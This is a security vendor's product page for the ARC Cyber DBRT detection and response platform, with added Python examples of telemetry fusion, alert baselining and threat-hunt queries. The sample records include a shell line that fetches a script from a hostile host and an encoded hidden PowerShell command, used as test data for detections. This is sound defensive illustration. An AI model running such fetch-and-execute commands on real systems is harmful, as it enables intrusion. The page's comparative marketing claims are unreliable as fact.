DATA BREACH RESPONSE TOOLKIT

Detect, Analyze and Respond Autonomously All In Real-Time

We Collect The Right Data 

The DBRT platform has data collection and processing at the core of its capabilities, and at ARC Cyber we believe that solving the data problem first is key. Security analysts struggle with having too much data, too little data, or data without context. If the data collection problem isn't solved properly, every tool downstream suffers from the age-old problem of garbage in, garbage out. ARC DBRT's data collection technology is called Interflow.


Interflow is a JSON-formatted data record that is normalized, reduced, and enriched with other telemetry to give context to what is occurring. DBRT's family of sensors captures network application data; server process, command and file data; and threat intelligence and geolocation data. Once collected, this data is fused together to form one record.
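As an added illustration (not Interflow's actual schema, and not ARC Cyber's code), the Python below builds a record the way the paragraph describes: several flows from a network sensor are reduced to one summary, joined to a process event the server sensor saw on the destination host within a short time window, and enriched with threat-intelligence reputation and geolocation lookups. The sample telemetry, the field names, the lookup tables and the ten-second window are all assumptions; the RFC 5737 documentation range stands in for an Internet address, which is why "public" is defined explicitly rather than with `ipaddress.is_global`.

```python
"""Fusing network, process, threat-intel and geo telemetry into one JSON
record, in the spirit of the Interflow description above. Added example:
not Interflow's schema and not ARC Cyber code. Every field name, lookup
table and sample value below is an assumption made for illustration."""
import ipaddress
import json
from collections import defaultdict
from datetime import datetime, timedelta

# --- constructed sample telemetry (not captured from any real network) ---
FLOWS = [  # network sensor: two flows between the same endpoints
    {"ts": "2024-05-01T10:00:00Z", "src_ip": "198.51.100.23", "dst_ip": "10.0.0.5",
     "dst_port": 443, "app": "https", "bytes_out": 1200},
    {"ts": "2024-05-01T10:00:02Z", "src_ip": "198.51.100.23", "dst_ip": "10.0.0.5",
     "dst_port": 443, "app": "https", "bytes_out": 47000},
]
PROCESSES = [  # server sensor on host 10.0.0.5
    {"ts": "2024-05-01T10:00:03Z", "host_ip": "10.0.0.5", "host": "web-01",
     "user": "www-data", "parent": "nginx",
     "cmdline": "/bin/sh -c curl http://198.51.100.23/p.sh"},
]
THREAT_INTEL = {"198.51.100.23": {"reputation": "malicious", "tags": ["scanner"]}}
GEO = {"198.51.100.0/24": {"country": "XX", "asn": 64496}}

# The RFC 5737 documentation range stands in for an Internet address; Python's
# ipaddress.is_global would reject it, so "public" is defined explicitly here.
INTERNAL_NETS = [ipaddress.ip_network(n) for n in
                 ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16",
                  "127.0.0.0/8", "169.254.0.0/16")]
WINDOW = timedelta(seconds=10)  # process activity this close to a flow is correlated


def parse_ts(ts):
    return datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ")


def reduce_flows(flows):
    """Collapse flows sharing src/dst/port/app into one summary record
    (the 'reduced' step: fewer records, same information)."""
    groups = defaultdict(list)
    for f in flows:
        groups[(f["src_ip"], f["dst_ip"], f["dst_port"], f["app"])].append(f)
    reduced = []
    for (src, dst, port, app), items in groups.items():
        reduced.append({"src_ip": src, "dst_ip": dst, "dst_port": port, "app": app,
                        "first_ts": min(i["ts"] for i in items),
                        "last_ts": max(i["ts"] for i in items),
                        "flow_count": len(items),
                        "bytes_out": sum(i["bytes_out"] for i in items)})
    return reduced


def enrich_ip(ip):
    """Attach geo and reputation context to an address (the 'enriched' step)."""
    addr = ipaddress.ip_address(ip)
    geo = next((g for net, g in GEO.items() if addr in ipaddress.ip_network(net)),
               {"country": "unknown", "asn": None})
    rep = THREAT_INTEL.get(ip, {"reputation": "unknown", "tags": []})
    public = not any(addr in net for net in INTERNAL_NETS)
    return {"ip": ip, "is_public": public, **geo, **rep}


def fuse(flows, processes):
    """Join each reduced flow to process events on its destination host that
    fall within WINDOW of the flow; emit one enriched record per flow."""
    records = []
    for flow in reduce_flows(flows):
        lo = parse_ts(flow["first_ts"]) - WINDOW
        hi = parse_ts(flow["last_ts"]) + WINDOW
        procs = [p for p in processes
                 if p["host_ip"] == flow["dst_ip"] and lo <= parse_ts(p["ts"]) <= hi]
        records.append({
            "event_type": "flow+process" if procs else "flow",
            "network": flow,
            "src": enrich_ip(flow["src_ip"]),
            "dst": enrich_ip(flow["dst_ip"]),
            "processes": [{k: p[k] for k in ("ts", "host", "user", "parent", "cmdline")}
                          for p in procs],
        })
    return records


if __name__ == "__main__":
    for rec in fuse(FLOWS, PROCESSES):
        print(json.dumps(rec, indent=2))
```

The point of the join is the context: on its own the flow is an HTTPS connection and the process is a curl invocation, but the fused record shows a malicious-reputation public source talking to a server whose web server process spawned a shell that fetched a script from that same source, all in one JSON object an analyst or a detection can query.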

We Detect The Real Threats


ARC Cyber's DBRT provides customizable security workbenches so that analysts get the tools they want. It ships with over 50,000 detections for known and unknown behaviors, mapped to the cybersecurity kill chain so that they act as an early-warning system. Because of its rich data collection, DBRT covers the complete kill chain, unlike other solutions in the market.

For example, detections at the delivery stage of the kill chain require a malware sandbox, and detections at the exploitation stage require IDS technology. ARC Cyber delivers the tools to detect and respond throughout the kill chain.

The solution also combines legacy technologies such as IDS with machine learning to increase fidelity and lower false positives. Machine learning builds a baseline of the signatures that normally fire often in a given environment and excludes those from consideration as high-fidelity alerts. Machine learning is also used to detect anomalous traffic patterns and server behavior.
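To make the baseline idea concrete, here is an added example (illustrative code, not ARC Cyber's machine learning) that learns each signature's normal daily hit rate from a history window and then triages today's hits: a signature that fires constantly is treated as routine noise at its normal level, while a signature that has never been seen, or one that spikes well above its own baseline, is kept as high fidelity. The signature names, the 14-day counts and the thresholds are assumptions.

```python
"""Baseline-then-suppress triage for signature alerts, as an added example of the
idea described above (a signature that fires routinely is not a high-fidelity
alert on its own; a spike or a never-seen signature is). Illustrative code, not
ARC Cyber's machine learning; thresholds and sample counts are assumptions."""
from statistics import mean, pstdev

# Constructed 14-day history of daily hit counts per signature (not real data).
HISTORY = {
    "policy-outbound-ssh": [40, 38, 45, 41, 39, 42, 44, 40, 37, 43, 41, 39, 42, 40],
    "scan-port-sweep":     [0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
    "policy-dns-over-tcp": [2, 3, 2, 2, 4, 3, 2, 3, 2, 2, 3, 3, 2, 2],
}
# Today's counts, including a signature never seen in the history.
TODAY = {"policy-outbound-ssh": 44, "scan-port-sweep": 30,
         "policy-dns-over-tcp": 3, "exploit-webshell-upload": 2}

NOISY_DAILY_MEAN = 10   # averages this many hits per day -> background noise
SPIKE_SIGMAS = 3.0      # how far above the mean counts as a spike
MIN_SIGMA = 1.0         # floor so a flat history still tolerates small jitter


def baseline(history):
    """Per-signature (mean, stdev) of daily counts: the learned 'normal'."""
    return {sig: (mean(counts), max(pstdev(counts), MIN_SIGMA))
            for sig, counts in history.items()}


def classify(sig, count, base):
    """new: never baselined; spike: well above its own normal;
    routine: chronic noise at a normal level; expected: rare and normal."""
    if sig not in base:
        return "new"
    mu, sigma = base[sig]
    if count > mu + SPIKE_SIGMAS * sigma:
        return "spike"
    if mu >= NOISY_DAILY_MEAN:
        return "routine"
    return "expected"


def triage(today, history):
    base = baseline(history)
    return {sig: classify(sig, n, base) for sig, n in today.items()}


def high_fidelity(today, history):
    """Signatures worth an analyst's attention today."""
    return sorted(sig for sig, verdict in triage(today, history).items()
                  if verdict in ("new", "spike"))


if __name__ == "__main__":
    for sig, verdict in triage(TODAY, HISTORY).items():
        print(f"{sig:26s} {TODAY[sig]:4d}  {verdict}")
    print("high fidelity:", high_fidelity(TODAY, HISTORY))
```

The caveat a practitioner would add: suppression has to be per environment (the noisy signature here is noisy because of how this network is used, not in general), and the spike test keeps a chronic signature from becoming a blind spot, since an attacker who happens to trip the same rule as legitimate traffic still shows up when the count jumps.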

Tools That Empower Threat Hunters 

Threat hunting has quickly become a popular strategy in cyber security operations, and the search for the unknown is as important as the detection of the unknown. With Open XDR, organizations can search the platform's rich dataset for malicious activity by building simple or complex queries on the fly. It is like having a Google search engine on your own data. For example, an operator can look for Windows PowerShell commands executed on a server that were initiated from a public IP address with a pre-existing bad reputation. Another example is searching for a specific file (by MD5 hash) uploaded to a server on the Internet by a specific user.

Once these search queries have been created, the operator can save them, turn them into custom visualizations for future use, and have them executed automatically to generate alerts and reports.
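The two hunts above, and the step of promoting a saved query to an automated alert rule, as an added example. This is illustrative code, not Open XDR's query language and not ARC Cyber's code: the clause format, the operators, the fused-record layout and the sample records (including the MD5 value and the IP addresses) are all assumptions.

```python
"""Ad-hoc hunting over fused records with a small clause-based query, then saving
the queries as alert rules, as an added example of the workflow described above.
Illustrative code, not Open XDR's query language and not ARC Cyber code; the
record layout, operators and sample records are assumptions."""
import operator
import re

# Constructed fused records with enrichment already applied (no real telemetry).
RECORDS = [
    {"ts": "2024-05-01T10:00:03Z", "host": "web-01", "user": "svc_web",
     "process": {"cmdline": "powershell.exe -nop -w hidden -enc SQBFAFgA", "parent": "w3wp.exe"},
     "src": {"ip": "203.0.113.7", "is_public": True, "reputation": "malicious"}},
    {"ts": "2024-05-01T10:05:00Z", "host": "web-01", "user": "admin",
     "process": {"cmdline": "powershell.exe Get-Service", "parent": "explorer.exe"},
     "src": {"ip": "10.0.0.44", "is_public": False, "reputation": "unknown"}},
    {"ts": "2024-05-01T11:00:00Z", "host": "web-01", "user": "svc_web",
     "file": {"name": "dump.7z", "md5": "0123456789abcdef0123456789abcdef", "direction": "upload"},
     "dst": {"ip": "203.0.113.9", "is_public": True, "reputation": "unknown"}},
    {"ts": "2024-05-01T11:30:00Z", "host": "db-01", "user": "backup",
     "file": {"name": "dump.7z", "md5": "0123456789abcdef0123456789abcdef", "direction": "upload"},
     "dst": {"ip": "10.0.0.9", "is_public": False, "reputation": "unknown"}},
]

OPS = {
    "eq": operator.eq,
    "in": lambda value, choices: value in choices,
    "contains": lambda value, needle: needle.lower() in str(value).lower(),
    "matches": lambda value, pattern: re.search(pattern, str(value), re.I) is not None,
}


def get_field(record, path):
    """Resolve a dotted path such as 'src.reputation'; missing keys give None."""
    cur = record
    for part in path.split("."):
        if not isinstance(cur, dict):
            return None
        cur = cur.get(part)
    return cur


def search(records, clauses):
    """Records satisfying every (field, op, value) clause. A clause on a field the
    record lacks never matches, so a process query cannot hit a file record."""
    def matches(rec):
        for field, op, value in clauses:
            actual = get_field(rec, field)
            if actual is None or not OPS[op](actual, value):
                return False
        return True
    return [r for r in records if matches(r)]


# Hunt 1: PowerShell executed on a server, initiated from a public IP with bad reputation.
POWERSHELL_FROM_BAD_IP = [
    ("process.cmdline", "matches", r"\bpowershell(\.exe)?\b"),
    ("src.is_public", "eq", True),
    ("src.reputation", "in", {"malicious", "suspicious"}),
]
# Hunt 2: a specific file (by MD5) uploaded to an Internet host by a specific user.
FILE_UPLOAD_BY_USER = [
    ("file.md5", "eq", "0123456789abcdef0123456789abcdef"),
    ("file.direction", "eq", "upload"),
    ("dst.is_public", "eq", True),
    ("user", "eq", "svc_web"),
]


def default_rules():
    """Saved queries promoted to scheduled alert rules."""
    return {"powershell-from-bad-ip": {"clauses": POWERSHELL_FROM_BAD_IP, "severity": "high"},
            "tracked-file-upload-by-user": {"clauses": FILE_UPLOAD_BY_USER, "severity": "medium"}}


def run_rules(records, rules):
    """Evaluate every saved rule against a batch of records; one alert per hit."""
    alerts = []
    for name, rule in rules.items():
        for hit in search(records, rule["clauses"]):
            alerts.append({"rule": name, "severity": rule["severity"],
                           "ts": hit["ts"], "host": hit["host"], "user": hit["user"]})
    return sorted(alerts, key=lambda a: a["ts"])


if __name__ == "__main__":
    for alert in run_rules(RECORDS, default_rules()):
        print(alert)
```

Note how the enrichment done at collection time is what makes the queries short: because each record already carries `is_public` and `reputation` for its source, the PowerShell hunt is three clauses rather than a join against a threat-intel table at search time.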

Respond Autonomously 


Along with its built-in response capabilities, the platform has orchestration plugins for SIEMs and for SOAR products such as Demisto, Phantom Cyber, Swimlane and Siemplify. The SIEM plugin streams events out of the platform; the SOAR plugins let the platform's detections automatically trigger playbooks that live in the orchestration product, which can then carry out a variety of actions such as executing scripts or integrating with adjacent tools.

On-Prem or SaaS Available

The solution is delivered as software that you install on your own physical or virtual x86 servers, on virtual machines in cloud providers such as AWS, Azure or Google Cloud, or as pre-installed hardware appliances.

There are Multiple Components that Create the Total Solution:

  • Network sensors collect network traffic from Ethernet switches.

  • Server sensors are installed on Linux and Windows servers to collect traffic, command, process and file data.

  • Container sensors collect traffic inside container environments.

  • Deception sensors act as honeypots within your environment.

  • Virtual appliance sensors can be deployed inside KVM, VMware and Hyper-V environments.

  • Data Processor nodes are deployed and can be clustered together to create a scalable big data platform for data storage and analytics.
